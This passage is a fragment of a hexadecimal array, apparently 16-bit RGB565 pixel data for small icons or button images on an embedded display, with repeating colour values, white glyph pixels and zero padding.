0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X00,0X00,0X00,0X00,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X1A,0XF6,0X75,0XE4,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X75,0XE4,0X98,0XED, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X75,0XE4,0X1A,0XF6,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X0E,0XD2,0XFF,0XFF,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X00,0X00, 0X00,0X00,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X1A,0XF6,0X75,0XE4, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0XD0,0XD2,0XFF,0XFF,0X31,0XDB,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X75,0XE4,0X1A,0XF6,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0XD0,0XD2,0XFF,0XFF,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X00,0X00,0X00,0X00,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X1A,0XF6,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF, 0XFF,0XFF,0X7B,0XF6,0X31,0XDB,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X75,0XE4,0X1A,0XF6,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0XD0,0XD2,0XFF,0XFF, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X00,0X00,0X00,0X00,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X1A,0XF6,0X75,0XE4,0X8C,0XC9,0X8C,0XC9,0XFF,0XFF,0XD0,0XD2, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X75,0XE4,0X1A,0XF6, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0XD0,0XD2,0XFF,0XFF,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X00,0X00,0X00,0X00,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X1A,0XF6,0X75,0XE4,0X8C,0XC9,0X8C,0XC9,0X75,0XE4,0X1A,0XF6,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X75,0XE4,0X1A,0XF6,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0XD0,0XD2,0XFF,0XFF,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X00,0X00, 0X00,0X00,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X1A,0XF6,0X75,0XE4, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0XFF,0XFF,0X92,0XDB,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X75,0XE4,0X1A,0XF6,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X0E,0XD2,0XFF,0XFF,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X00,0X00,0X00,0X00,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X1A,0XF6,0X75,0XE4,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X14,0XE4,0XDC,0XF6,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X75,0XE4,0X1A,0XF6,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0XFF,0XFF, 0XD0,0XD2,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X00,0X00,0X00,0X00,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X1A,0XF6,0X75,0XE4,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0XDC,0XF6,0X75,0XE4,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X75,0XE4,0X1A,0XF6, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X75,0XE4,0X7B,0XF6,0XD0,0XD2, 0X8C,0XC9,0X8C,0XC9,0X75,0XE4,0X92,0XDB,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X00,0X00,0X00,0X00,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X98,0XED,0X14,0XE4,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X31,0XDB,0X98,0XED, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X14,0XE4,0X98,0XED,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X75,0XE4,0XDC,0XF6,0XFF,0XFF,0XFF,0XFF, 0X37,0XED,0X0E,0XD2,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X00,0X00, 0X00,0X00,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X00,0X00,0X00,0X00,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X00,0X00,0X00,0X00,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X00,0X00,0X00,0X00,0X8C,0XC1,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC1,0X00,0X00, 0X00,0X00,0X08,0X89,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X08,0X89,0X00,0X00,0X00,0X00,0X42,0X20, 0X8C,0XC1,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC1,0X42,0X20,0X00,0X00,0X00,0X00,0X00,0X00,0X42,0X20,0X29,0X91, 0X8C,0XC1,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC1,0X29,0X91,0X42,0X20, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X81,0X28,0X44,0XB2,0X06,0XF3,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X06,0XF3, 0X44,0XB2,0X81,0X28,0X00,0X00,0X00,0X00,0X00,0X00,0X81,0X28,0X06,0XF3,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X06,0XF3, 0X81,0X28,0X00,0X00,0X00,0X00,0X24,0XAA,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X24,0XAA,0X00,0X00, 0X00,0X00,0X06,0XF3,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X06,0XF3,0X00,0X00,0X00,0X00,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X00,0X00,0X00,0X00,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X00,0X00,0X00,0X00,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X00,0X00, 0X00,0X00,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X93,0XFD,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF, 0XFF,0XFF,0XF4,0XFD,0X26,0XFB,0X26,0XFB,0X36,0XFE,0X10,0XFD,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0XFF,0XFF,0X0B,0XFC,0X26,0XFB,0X26,0XFB,0X26,0XFB,0XC9,0XFB, 0XFF,0XFF,0X93,0XFD,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XD9,0XFE,0X6C,0XFC, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X00,0X00,0X00,0X00,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X98,0XFE,0X51,0XFD,0X26,0XFB,0X26,0XFB,0X26,0XFB,0XF4,0XFD, 0XD9,0XFE,0X26,0XFB,0X51,0XFD,0X98,0XFE,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X0B,0XFC, 0XFF,0XFF,0X93,0XFD,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X10,0XFD,0XD9,0XFE,0X98,0XFE, 0X51,0XFD,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X6C,0XFC,0XFF,0XFF,0X6C,0XFC,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X00,0X00,0X00,0X00,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X98,0XFE,0X51,0XFD,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X1B,0XFF,0X0B,0XFC, 0X0B,0XFC,0XFF,0XFF,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X51,0XFD,0X36,0XFE,0XD9,0XFE, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0XF4,0XFD,0X93,0XFD,0X98,0XFE,0X51,0XFD,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X51,0XFD,0XF4,0XFD,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X00,0X00,0X00,0X00,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X98,0XFE,0X51,0XFD, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X98,0XFE,0X0B,0XFC,0X26,0XFB,0XFF,0XFF, 0XC9,0XFB,0X26,0XFB,0X26,0XFB,0X98,0XFE,0X6C,0XFC,0XFF,0XFF,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X1B,0XFF,0X6C,0XFC,0X98,0XFE,0X51,0XFD,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X51,0XFD,0X36,0XFE,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X00,0X00, 0X00,0X00,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X98,0XFE,0X51,0XFD,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X1B,0XFF,0X0B,0XFC,0X26,0XFB,0X98,0XFE,0X10,0XFD,0X26,0XFB, 0X26,0XFB,0XFF,0XFF,0X26,0XFB,0X98,0XFE,0X0B,0XFC,0X26,0XFB,0X88,0XFB,0XFF,0XFF, 0X26,0XFB,0X98,0XFE,0X51,0XFD,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X0B,0XFC,0XFF,0XFF, 0X6C,0XFC,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X00,0X00,0X00,0X00,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X98,0XFE,0X51,0XFD,0X26,0XFB,0X26,0XFB,0X26,0XFB,0XF4,0XFD, 0XD9,0XFE,0X26,0XFB,0X26,0XFB,0X51,0XFD,0X36,0XFE,0X26,0XFB,0XC9,0XFB,0XD9,0XFE, 0X26,0XFB,0X51,0XFD,0X51,0XFD,0X26,0XFB,0X6C,0XFC,0XD9,0XFE,0X26,0XFB,0X98,0XFE, 0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XD9,0XFE,0X6C,0XFC,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X00,0X00,0X00,0X00,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X98,0XFE,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF4,0XFD,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X0B,0XFC,0XFF,0XFF,0X26,0XFB,0X10,0XFD,0XF4,0XFD,0X26,0XFB,0X6C,0XFC, 0X98,0XFE,0X26,0XFB,0X93,0XFD,0X93,0XFD,0X26,0XFB,0X98,0XFE,0X51,0XFD,0X26,0XFB, 0X26,0XFB,0XFF,0XFF,0X0B,0XFC,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X00,0X00,0X00,0X00,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X98,0XFE,0X51,0XFD, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0XFF,0XFF,0X88,0XFB,0X36,0XFE,0XAE,0XFC,0X26,0XFB,0X26,0XFB,0XFF,0XFF,0X26,0XFB, 0XD9,0XFE,0XAE,0XFC,0X26,0XFB,0X98,0XFE,0X51,0XFD,0X26,0XFB,0X26,0XFB,0X51,0XFD, 0X98,0XFE,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X00,0X00, 0X00,0X00,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X98,0XFE,0X51,0XFD,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0XD9,0XFE,0XAE,0XFC, 0X1B,0XFF,0X88,0XFB,0X26,0XFB,0X26,0XFB,0XD9,0XFE,0X6C,0XFC,0XFF,0XFF,0X88,0XFB, 0X26,0XFB,0X98,0XFE,0X51,0XFD,0X26,0XFB,0X26,0XFB,0X26,0XFB,0XFF,0XFF,0XAE,0XFC, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X00,0X00,0X00,0X00,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X98,0XFE,0X51,0XFD,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X93,0XFD,0X98,0XFE,0XFF,0XFF,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0XF4,0XFD,0X36,0XFE,0X1B,0XFF,0X26,0XFB,0X26,0XFB,0X98,0XFE, 0X51,0XFD,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X10,0XFD,0X1B,0XFF,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X00,0X00,0X00,0X00,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X98,0XFE,0X51,0XFD,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X6C,0XFC,0XFF,0XFF,0X36,0XFE,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0XAE,0XFC,0XFF,0XFF,0XF4,0XFD,0X26,0XFB,0X26,0XFB,0X98,0XFE,0X51,0XFD,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X1B,0XFF,0X51,0XFD,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X00,0X00,0X00,0X00,0X26,0XFB,0X26,0XFB,0X26,0XFB,0XF4,0XFD,0X10,0XFD, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0XFF,0XFF,0XAE,0XFC,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X88,0XFB,0XFF,0XFF, 0X6C,0XFC,0X26,0XFB,0X26,0XFB,0X36,0XFE,0X10,0XFD,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X6C,0XFC,0X36,0XFE,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X00,0X00, 0X00,0X00,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X00,0X00,0X00,0X00,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X00,0X00,0X00,0X00,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X00,0X00,0X00,0X00,0X06,0XF3,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X06,0XF3,0X00,0X00, 0X00,0X00,0X24,0XAA,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 